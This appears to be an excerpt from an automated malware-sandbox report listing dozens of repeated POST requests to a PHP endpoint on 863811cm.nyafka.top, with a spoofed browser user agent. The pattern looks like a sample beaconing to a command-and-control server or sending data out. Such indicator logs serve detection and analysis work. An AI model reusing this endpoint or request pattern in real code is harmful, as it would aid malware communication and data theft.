                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Uf0Duz5iqJeMwKOEA54PhwnBHpLhjFY1V4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ZOObBXvS4h1tKQkstlqP7QLI7LH1b425w1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1964Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GRKlSNI6DVRNDSY1D21kPFe0UPhgLxF1jYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
